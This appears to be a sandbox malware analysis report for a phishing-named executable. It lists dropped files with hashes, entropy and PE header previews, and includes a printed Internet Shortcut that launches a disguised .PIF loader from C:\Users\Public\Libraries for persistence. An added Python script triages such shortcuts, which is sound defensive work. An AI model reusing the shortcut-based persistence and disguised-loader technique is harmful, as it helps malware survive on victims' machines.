Encrypted:false
SSDEEP:24576:O8oREwt2ioQ3J+RHsqjnhMgeiCl7G0nehbGZpbD:O8oRpoFbDmg27RnWGj
MD5:109D2003493F3C63ACECE31C542F5C24
SHA1:0DD1735B67A4E0124AE33BA19CAFD203EC121258
SHA-256:7022EAE681183AD1B57E944BC2099DFB15EFF16EE609907E3F39529D780618E2
SHA-512:6AACE908D1DA8A471FB165E95DF51994EB155D4F3CC54E790C38A185800A9C73CADFA808A20B5F539809441E41DAA6E59E6944E0FD695B9AAA7C8653FE55C8C0
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1341952
Entropy (8bit):5.2385898329538865
Encrypted:false
SSDEEP:24576:ef8HQlDMxHwJ07wHsqjnhMgeiCl7G0nehbGZpbD:ekHQlqwJ0gDmg27RnWGj
MD5:0412F310533E8FCC77646C26A9FD2211
SHA1:D87B19BFBF099BBF5C150B2D86C5B62C191177CD
SHA-256:FB7667BA079E96B82C0160B1AF306E5EA25265F772485A9860C4AEAB72EF6E19
SHA-512:9ABA5593AA299D4413F689B112E6DD89A01726048890D407E4EB73A5C8B23CB177A2E32F04168B174AB5F51971B15F8713221D3EC0D76075330BF50B019C980B
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1534464
Entropy (8bit):7.124578693722774
Encrypted:false
SSDEEP:24576:oSEmYD6gjGPG45QVDkfXplyTyEsqjnhMgeiCl7G0nehbGZpbD:o5mYD6g2GWQVQf3yTHDmg27RnWGj
MD5:640EC5D89ACEB0A5B3115B09E3C3D84E
SHA1:3F7A53211532E1B91C541961239C077F047BDF75
SHA-256:B829D37C72262600C27C15F8070D44D8A495F57122A1E8AE97133FA8BBC7DE25
SHA-512:2B49AA189D6A191F62818B4AE55282CF5102654E064FE0912203B5AB5409059D7F7EF9809B08291E1DCF4E955CB201D4132218C90E7F01520BFB3806C46A0870
Malicious:true
Reputation:unknown

Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4
Entropy (8bit):2.0
Encrypted:false
SSDEEP:3:sy:sy
MD5:6FA15CB635D61101C5C1FD0D3DA7BCBE
SHA1:3DD7E89969F62674BB4F1E1804D12F7984CA50CB
SHA-256:A7A13D1B48050194EC1A629253456D89916E51DFC6A641096CC0D4F007BC6C9C
SHA-512:929970595BA4B524C60F9275EBAC75F31978141ACE593AAD10BC4CEC527B22B22A1B1210340169DC2D040E2E5A1A2562C81C2DF6D1A5918224A499075A54248D
Malicious:false
Reputation:unknown
Preview:98..

Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
File Type:data
Category:dropped
Size (bytes):1644384
Entropy (8bit):7.201679795231161
Encrypted:false
SSDEEP:24576:x2ZbSbxvfLzOaLw2sBejF/LHHclwHXQyXIFBe+Z:xqSbxfOv2sexzHPpXIFBlZ
MD5:60E35BCBEC840DBC57F6E96F07092037
SHA1:FB4BADFCA8BA6EDE36D462A33455EAD2536C5EA5
SHA-256:D3150ADC33A74030DE51CA0E850B5FB4465BE2A5BCFB023DD4CDD4196B258A49
SHA-512:C685B9A169F6F034F40999BB11446522E05622FB50B86DC11A6992945C8EC31B9EDC20345897B247BB08118919F46B43F49C7518BA0115A7D8DA52C84A2229AC
Malicious:false
Reputation:unknown

Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:dropped
Size (bytes):62357
Entropy (8bit):4.705712327109906
Encrypted:false
SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:B87F096CBC25570329E2BB59FEE57580
SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:false
Reputation:unknown

Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):68096
Entropy (8bit):6.328046551801531
Encrypted:false
SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:C116D3604CEAFE7057D77FF27552C215
SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF">), ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):104
Entropy (8bit):5.17500507473634
Encrypted:false
SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMoPKaOsbxTRefAlv:HRYFVmTWDyz5xOExsolv
MD5:7B16FB7DD80B4298C6D276AB24CFDBDC
SHA1:53E7996E8B25BB22DF05A53F77B6B25042B4B4E1
SHA-256:94204017ED604221DAF7742713C8E266B5F256C74DA6F1823A44FC66FD3732E6
SHA-512:7C23CE95763FE85E2E763A32817849B0C907F0DD7493A74A7E3BC2003F6783E5B4F62FE4A719379C92A6D1A649BEEA58F616CB5DB9EAF91AE2EEE9DFEE91BF5E
Malicious:true
Reputation:unknown
Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF"..IconIndex=931417..HotKey=16..
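
The 104-byte dropped file above is a complete `.url` Internet Shortcut (the preview's `..` are CRLF pairs, and the four lines add up to exactly the reported size). Its target is not a web address but a local program, `file:"C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF"`: a `.PIF` with PE contents is run by the shell like an `.exe`, `C:\Users\Public` is writable by every local user, and `Sdvvfamy` is the name of the process reported elsewhere on this page as dropping further files, `ymafvvdS.pif`, spelled backwards. The triage script below is an added example for this page, not tooling from the report or the sample; it parses the shortcut text reconstructed from the preview and flags those three properties. The directory and extension lists are assumptions to extend for your environment.

```python
import ntpath
import re

# Shortcut text reconstructed from the report preview ('..' in the preview is CRLF);
# the doubled backslashes are present in the file as shown there.
URL_FILE = (
    '[InternetShortcut]\r\n'
    'URL=file:"C:\\\\Users\\\\Public\\\\Libraries\\\\Sdvvfamy.PIF"\r\n'
    'IconIndex=931417\r\n'
    'HotKey=16\r\n'
)
# Process reported elsewhere on this page as dropping further files.
LOADER_PROCESS = r'C:\Users\Public\Libraries\ymafvvdS.pif'

# Extensions the Windows shell runs directly when a shortcut points at them (assumed list).
EXEC_EXTS = {'.pif', '.exe', '.scr', '.com', '.bat', '.cmd', '.vbs', '.js', '.hta', '.lnk'}
# Directories every local user can write to, lower-case with trailing backslash (assumed list).
SHARED_DIRS = ('c:\\users\\public\\', 'c:\\programdata\\')


def parse_url_shortcut(text):
    """Return key/value pairs from the [InternetShortcut] section (keys lower-cased)."""
    section, fields = None, {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].lower()
        elif section == 'internetshortcut' and '=' in line:
            key, value = line.split('=', 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def local_target(url):
    """Normalised Windows path if URL is a file: reference, else None."""
    m = re.match(r'(?i)file:(?://)?(.*)$', url.strip())
    if not m:
        return None
    path = m.group(1).strip().strip('"')
    return path.replace('\\\\', '\\').replace('/', '\\')


def triage(text, dropping_process=None):
    """Return (findings, target_path); findings is empty for an ordinary web shortcut."""
    fields = parse_url_shortcut(text)
    path = local_target(fields.get('url', ''))
    findings = []
    if path is None:
        return findings, None
    stem, ext = ntpath.splitext(ntpath.basename(path))
    if ext.lower() in EXEC_EXTS:
        findings.append(f'file: URL points at a local executable ({ext})')
    if path.lower().startswith(SHARED_DIRS):
        findings.append('target sits in a directory writable by every local user')
    if dropping_process:
        pstem = ntpath.splitext(ntpath.basename(dropping_process))[0]
        if pstem.lower() == stem.lower()[::-1]:
            findings.append(f'target name {stem} is {pstem} spelled backwards')
    return findings, path


if __name__ == '__main__':
    print('size matches report:', len(URL_FILE) == 104)
    for finding in triage(URL_FILE, LOADER_PROCESS)[0]:
        print('-', finding)
```

The same parser applies to any `.url` pulled from a user's Desktop or Startup folder; the reversed-name check is specific to what this report shows and is only worth keeping if you see the pattern recur.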

Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):236544
Entropy (8bit):6.4416694948877025
Encrypted:false
SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18944
Entropy (8bit):5.742964649637377
Encrypted:false
SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:B3624DD758CCECF93A1226CEF252CA12
SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.986344012767398
Encrypted:false
SSDEEP:192:VchnlVgF4rjKX+5xC7ZBfVb9kW9M7r4BfDmUJzrDJGc+rgeVJ6sIr:VcKFCeX+5xeD/Kwbmo4Hrr0sIr
MD5:8566466B1184D8B575286A62054CF982
SHA1:CF9E9374D630CE5354CA60CC93AF07370EA6191A
SHA-256:0F86B53FA2EE81D05BEE3194E5440AE0C60DA46BEECBB0C93D6C64FFD2CE2F2C
SHA-512:6F3101E296853FC48D66E534B5B11F49910ED404C986339FB0BC016DDDD68984CDB69B10766B82BD880CEAA73EBCCD399FD9E561BBFAB37927CA004D8E43A92B
Malicious:false
Reputation:unknown
Preview:....2...t.2.v..X...E....`...&Y+.6..;...o.Tfl..t./y;j.u..j........w.........m{9..NxY........NYc.#$...OI.q.J...#..].\.s.Z..T......8.q.:......A.aw.]%.].....:{.1<..Zq...X...*2o.&..D6..R..6/........bi.<....O..,..-O......y.Z/.tR....R.^I....-L.......|-!...`a..A......f.....JbI.o.V.[4m.".(Z.6..=9..7.8{..t...+4...l.@...q..7j..Dy..Ob{.....;e:........5.6v..........g<s...l.s..a(r.?..K...7.yl.[.u[:j.)!e....,2...8..4...R(..z.|...i(.......g..Ng;E..hw...y. n..r.?..%^..IDPv3!a......:}H..#j)...L.........n...U. @..~.iP..}......(2..(d.k.a.%.,.".O.....9.$G..3....,..o.0S7........N2.,-.O.+B....u^...[.t".).U.T.2s.y.]g.....v...l...'..hs.7 "..^.....|cJ......!.r.j.5.....c..Yz.O.+H#...W....&A.$".zk"...t.$sEfM..2$.c.....g..B.<.X........z#......Az.FL6....V..*F..`.9...........c........@~.......R...s..J....qQ...4(..{F....w......[V....6{.9.....j.%.b"...4...6.O....`.6...3. .....T.......].^F..e.}.I.*0-......dIH2....br...pk...&G.vfj..Xv..i...$>.ogx.W.N.....m.....O^.7...`lR*X....^

Process:C:\Windows\System32\msdtc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):2313
Entropy (8bit):5.130024832551288
Encrypted:false
SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786m:Z070s0Y0q0mF7Dm59
MD5:0856C129304C327251231FD67257DDA8
SHA1:24D5F8EDD8DE135F367BD28A9E484238B5DB5DC2
SHA-256:F288D1F23C444E6A42AD89120FE84E6F4327C9E1766CB6845FB73FB557B1A85C
SHA-512:C79FBDCE7C451377A29328D89245DE2303E3A887FCEA8F08C234AB9234360438B20B67D7D91AF97D61B27BC653E24F0B4D636C49C05F099843B811714CCC0231
Malicious:false
Reputation:unknown
Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1150976
Entropy (8bit):5.038913337481986
Encrypted:false
SSDEEP:12288:eJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eJsqjnhMgeiCl7G0nehbGZpbD
MD5:B5FDD433E07825BDB9C6B8F563B00FDE
SHA1:088BA8DA725FEFC5FBA54D95A3738C14B62817ED
SHA-256:A0CCDD661623B7E31B4F1959B87AC057382A9B6F2063E257839496ED3506450D
SHA-512:24191C8E46F184B69EC048BDA9BC13DFB848C405E59889AF1E76B194D1B4F2266D75674DD74F31F7E73136B8D97D0E0853A4FA6A89D72E5DC8AE5DF382CA3F1D
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................v............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1801216
Entropy (8bit):6.97430492464371
Encrypted:false
SSDEEP:49152:6wVFr68Vw9wn/6h8N1zidsDmg27RnWGj:6wVFrssC/dsD527BWG
MD5:11EB7B63D45B07D2E9811E4D818A0174
SHA1:400E0A4EC021282508133290A8187A929BB23FCE
SHA-256:9E704FE9E411474BC7BF50ECF7E65FA56689F73F348E8AEB273FD4F935E80F9D
SHA-512:CA500251D818826DB0B4682DAA6081F252588D279441ADED3E36F5B78DFC7EE5CA99DBEB1DBE8A9B3F9649BA81D1BBA6DD8F08C1490B1A742CF101D5456E3AD3
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1348608
Entropy (8bit):7.253729790235816
Encrypted:false
SSDEEP:24576:kQW4qoNUgslKNX0Ip0MgHCpoMBOuBsqjnhMgeiCl7G0nehbGZpbD:kQW9BKNX0IPgiKMBOuVDmg27RnWGj
MD5:500275C60FCB5B035FD81A2BA2CB2073
SHA1:76098E76A8274C689CA73C9A2A4706479D1290CE
SHA-256:CA15CA9E777125297E77BB5A3A4AAAC742FC10A10AB4790362B7080B81162A6B
SHA-512:652C570586616EEC04620E4ED04C220E106272B99A48A0A22A9187A64B817723A4B5C5A2C08C87EB431956355797F1635839A0E07D7A53C1743010F56B23FC01
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1224192
Entropy (8bit):5.163555307805148
Encrypted:false
SSDEEP:24576:k2G7AbHjkesqjnhMgeiCl7G0nehbGZpbD:k2G7AbHjPDmg27RnWGj
MD5:4B67BD8AAA681D11F735DC710C48E0D8
SHA1:C4C2308319E6063379E88C0DDD3C06F8C40D7D98
SHA-256:33947CF7E895BB364EA43D43F6148CCECDB4D6FE2D81B0967D707EE527EDD40D
SHA-512:F065A2E1281D0B6CB14DABA1BAFC031F6937B305CA57C3C1BD410E3928E5A3CD2FFC8B02EF5172FF5693CD622E0968F27E94449A18E7852993F56043E8946847
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................(.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1242624
Entropy (8bit):7.288942719136332
Encrypted:false
SSDEEP:24576:skdpSI+K3S/GWei+qNv2uG3msqjnhMgeiCl7G0nehbGZpbD:s6SIGGWei2uG3qDmg27RnWGj
MD5:3117CDDE7FDB0851FDBCA3E7FDB7A142
SHA1:CD822847001CE1ECBC113AD886042B370C61EAD7
SHA-256:3993D265015583A7FCBE9E4D02E42FBD9DD5BEA456881CEA3E99145732B22E78
SHA-512:9B8EE6BB9A2C4711FBCA847FC7FD9C6AD70C2C73BDED5EA16A21ADFBAA382B9C9A82F185E145E5FB4B82536754CA0BFEAA44763459C2347A17422FA2FB21E32E
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......[..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1141248
Entropy (8bit):5.01751872118564
Encrypted:false
SSDEEP:12288:oFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oFsqjnhMgeiCl7G0nehbGZpbD
MD5:979F07784823EB9149D134FBAB0B4376
SHA1:317CDBE9C3979E7125E538C1062CF9FC48D15BD3
SHA-256:2CD35C56FF3E15DCA73EC7DF990911EC66103A8FD979E8381D1684263BB98E29
SHA-512:FB70A8B290E8373AD33BEB0A12BC98ADDD73B35EE1A387CF0485F70A1E603D457E32723D3995B4D1B534788E154B5FDF4C8CE36FFB8961CD0037E6787858C17D
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@....................................4y.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

Process:C:\Windows\System32\msdtc.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.32132367112088095
Encrypted:false
SSDEEP:6:5lYXl8ta/k/uMclF6vMclFq5zUR/tz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+G2Xn:Al80kqF69Fq5zYq6CzE5Z2+fqjFXn
MD5:CB8CD05871B2C46B42EF4FFA61BFCB28
SHA1:8B335BC5EDF4AEA7F2BA2CBB814D9D0529EC1CBB
SHA-256:7232A17535DC01052050C3991E0CEBB7BD317D8B7844C61317549E2F4AC807F9
SHA-512:14E178E66AB900DB135EFA89BB390666A6621293A90AFD698288931F66E7C3A3BEB931B3055E8BD1FDBFCC80DD066DA428FDC2D1607F252B5764CAC092DA8CB5
Malicious:false
Reputation:unknown
Preview:.@..X...X.......................................X...!........................... ........Ee.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................X.Pl...........Pe...J..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P. ........Ee............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1511424
Entropy (8bit):5.222903988226532
Encrypted:false
SSDEEP:12288:1ObHA4LWOsvAYFTuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:yjL3UTusqjnhMgeiCl7G0nehbGZpbD
MD5:A5F4C6CB650242AC4B9D281D7FB3AD95
SHA1:2351FF38B04CD26CB1C808E6B8F52585F2220543
SHA-256:15CE775FC9B0A4FB28877DAFE6B111974A1CDF523E6A6B92125634B22A83AB53
SHA-512:5D20A36FD67842142F12FCE22AA1AB46C2F6F4D3827B55D1B507F35AB26FF056DBCC73C5656960269814FE8798575842D9E9A2E4C266D98DA8C25D832006F9F3
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@.....................................p.... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1235968
Entropy (8bit):5.18218856442812
Encrypted:false
SSDEEP:12288:xpFtQOaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IOasqjnhMgeiCl7G0nehbGZpbD
MD5:93CC0F7EAE7D58C22855106B435E4B64
SHA1:491B2CF88A7376992FA8A09435D809F1356BCE7F
SHA-256:03BD61C0EADA9362E0B60F533C4E8618C8B711B2A704A33FAD60306F6DE32178
SHA-512:4F187405FA20DD10DFE8D82FC2E13A43601C5A82291F7E3766434C22D3B283704D5D64D277B99C4149083403C61E8A255643165ACF4E3D6C564B3983C8032C48
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):7.102359054616168
Encrypted:false
SSDEEP:24576:v3frCoQItLsiLPLe24CxruW4bIhllusqjnhMgeiCl7G0nehbGZpbD:v3fzsIPLkCNuVbIhDCDmg27RnWGj
MD5:E0AE6E1D69AAF0851F2D210AAFBDD0FE
SHA1:F7C3FE3754015382818F8163D8FF8D83FE94B678
SHA-256:B3792AA6AF47AAAE9D8C80F89BDDC7012B80EB58192FFCC805E3FDFE6DD0C129
SHA-512:88AEDE5FEFD6202F086DBF8E2770A3AFDC822EB3D1B7CABCEFED13D2D26FD21BA011F4CED750B493D12FADEFA5FE9DFDFB2B42FF64988DB92C838D33A21081BD
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1846784
Entropy (8bit):6.939427955436724
Encrypted:false
SSDEEP:24576:JW6BApg2YuyuNDYTabvcRvNYf8km1rsqjnhMgeiCl7G0nehbGZpbD:JF2YuHNETovcvNYf8km9Dmg27RnWGj
MD5:3F2AB6CB57E7A0604E4E19795A526BD3
SHA1:C5778D1B77B0AA28F1E896BDAA612CFAFC710C94
SHA-256:B294DD3E489D0E9C3CBE4C9CF5A7227AAAFDCA3DFCF8CE867EE64D50C865552C
SHA-512:D3C7384919718FFBCBB84EBD104FA131F388D5944A0CCE89FE184E3EB7EDC12ADAAFF1395C36395BE9D967E6BA7A39465094EAB4175166302B8E222F3085F716
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):7.238877280992664
Encrypted:false
SSDEEP:24576:OiW6ZvAKF5i/dN9Bdexj9Trk+FasqjnhMgeiCl7G0nehbGZpbD:OYxF50b9Bdm9TxEDmg27RnWGj
MD5:07D3656AD4DF3DADDEDA88F101DE735C
SHA1:5E04AE069B00A9B04E276DF442F65EF628418B2D
SHA-256:525330FD71418435B58DAE8BADF0B16EDC3C6046BF6757AFBF242B43AC704032
SHA-512:7D3117B6578F5524047BF25FF7083A066B4A2A07C94BDE48E66F7A402C4EF0C68B649D05CE93EAC37CE9704DB26A454B6D3D81093966E6686C66015E2C038320
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):5.476577895047903
